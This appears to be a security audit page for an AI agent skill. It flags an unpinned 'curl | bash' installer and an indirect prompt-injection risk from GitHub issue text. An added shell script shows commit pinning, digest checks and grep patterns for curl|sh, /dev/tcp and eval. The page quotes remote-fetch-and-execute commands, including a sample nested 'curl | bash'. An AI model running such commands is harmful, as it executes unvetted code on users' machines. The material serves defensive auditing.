oh-my-hermes-workflow
Fail
Audited by Snyk on May 16, 2026
Risk Level: CRITICAL
Full Analysis
CRITICAL E005: Suspicious download URL detected in skill instructions.
- Suspicious download URL detected (high risk: 0.80). The URL set includes an explicit "curl | bash" of a raw.githubusercontent.com install.sh from an unvetted GitHub account/repo (plus instructions to run other repository scripts), which is a high-risk pattern for distributing arbitrary or malicious shell code. The other links are mostly documentation, API endpoints, or placeholders and are lower risk, but they do not mitigate the danger of executing the install script.
MEDIUM W011: Third-party content exposure detected (indirect prompt injection risk).
- Third-party content exposure detected (high risk: 0.80). The skill's autonomous workflows explicitly read and act on user-generated GitHub content (e.g., the "auto-issue-triage" hourly job and "manage-github-issues" / Autonomous CTO Loop in SKILL.md) via the GitHub integration, so untrusted third-party issue text can influence decisions and trigger actions.
MEDIUM W012: Unverifiable external dependency detected (runtime URL that controls agent).
- Potentially malicious external URL detected (high risk: 1.00). The install instructions explicitly run remote code (curl -fsSL https://raw.githubusercontent.com/salomondiei08/oh-my-hermes/main/install.sh | bash) and also give a git clone (https://github.com/salomondiei08/oh-my-hermes) followed by bash /tmp/oh-my-hermes/install.sh, so the skill's installation fetches and executes remote code from those URLs. Because both references point at the mutable main branch rather than a pinned commit or a verified digest, the code that actually runs can change at any time without any change to the skill's instructions.
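Added example for this audit page (not code from the oh-my-hermes project or from Snyk): the handling E005 and W012 call for when a skill ships a "curl | bash" installer. The script pins the raw URL to a commit instead of the mutable main branch, verifies a downloaded file against a recorded SHA-256, and runs a static triage for remote-execution constructs before anything is executed. The commit SHA, the digest, and the sample installer are constructed placeholders, not real values from the repository; the helper names (pin_raw_url, verify_digest, triage_install_script) are this example's own.

```shell
#!/bin/sh
# Added example for this audit page (not code from the oh-my-hermes project or
# from Snyk). It shows the handling that E005/W012 call for when a skill ships
# a "curl | bash" installer: pin the raw URL to a commit instead of the mutable
# main branch, download to a file, verify a recorded SHA-256, and run a static
# triage for remote-execution constructs before anything is executed.
# The commit SHA, the digest and the sample installer below are constructed
# placeholders, not real values from the repository.

# Rewrite a raw.githubusercontent.com URL that references the mutable "main"
# branch so it references an immutable commit; refuse anything else.
pin_raw_url() {
  url="$1"; commit="$2"
  case "$url" in
    https://raw.githubusercontent.com/*/*/main/*) ;;
    *) echo "refusing to pin (not a raw.githubusercontent.com main-branch URL): $url" >&2; return 1 ;;
  esac
  printf '%s\n' "$url" | sed "s#/main/#/$commit/#"
}

# SHA-256 of a file, using whichever tool the host provides.
sha256_of() {
  if command -v sha256sum >/dev/null 2>&1; then
    sha256sum "$1" | awk '{print $1}'
  else
    shasum -a 256 "$1" | awk '{print $1}'
  fi
}

# Succeed only if the file matches the digest recorded when it was reviewed.
verify_digest() {
  [ "$(sha256_of "$1")" = "$2" ]
}

# Static triage of an installer before it runs: print every line that contains
# a construct a reviewer must read (nested curl|sh, decoded payloads, eval,
# /dev/tcp, sudo). Returns 0 only when nothing is flagged.
triage_install_script() {
  file="$1"; hits=0
  for pat in \
    '(curl|wget)[^|]*\|[[:space:]]*(ba)?sh' \
    'base64[[:space:]]+(-d|--decode)' \
    '(^|[^[:alnum:]_])eval[[:space:]]' \
    '/dev/tcp/' \
    '(^|[^[:alnum:]_])sudo[[:space:]]'; do
    if grep -nE -- "$pat" "$file"; then
      hits=$((hits + 1))
    fi
  done
  [ "$hits" -eq 0 ]
}

# Constructed stand-in for a downloaded install.sh; the nested remote fetch is
# there so the triage has something to flag.
make_sample_installer() {
  cat > "$1" <<'EOF'
#!/bin/sh
set -e
echo "installing oh-my-hermes"
mkdir -p "$HOME/.hermes"
curl -fsSL https://example.invalid/extra.sh | bash
EOF
}

# Walk through the whole procedure on the sample file (no network access).
demo() {
  commit=0123456789abcdef0123456789abcdef01234567   # placeholder, not a real commit
  pinned=$(pin_raw_url 'https://raw.githubusercontent.com/salomondiei08/oh-my-hermes/main/install.sh' "$commit")
  echo "fetch with: curl -fsSL -o install.sh '$pinned'   (never '| bash')"
  tmp=$(mktemp)
  make_sample_installer "$tmp"
  echo "sha256 to record after review: $(sha256_of "$tmp")"
  if triage_install_script "$tmp"; then
    echo "triage: nothing flagged; verify_digest and read it before running"
  else
    echo "triage: flagged lines above must be reviewed before this installer runs"
  fi
  rm -f "$tmp"
}
demo
```

Run it with `sh verify_installer.sh`. A recorded digest is only meaningful together with commit pinning: a digest taken from the main branch today says nothing about what the same URL serves tomorrow, and the triage is a reading aid for the reviewer, not a substitute for reading the script.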
Issues (3)
E005 CRITICAL: Suspicious download URL detected in skill instructions.
W011 MEDIUM: Third-party content exposure detected (indirect prompt injection risk).
W012 MEDIUM: Unverifiable external dependency detected (runtime URL that controls agent).
Audit Metadata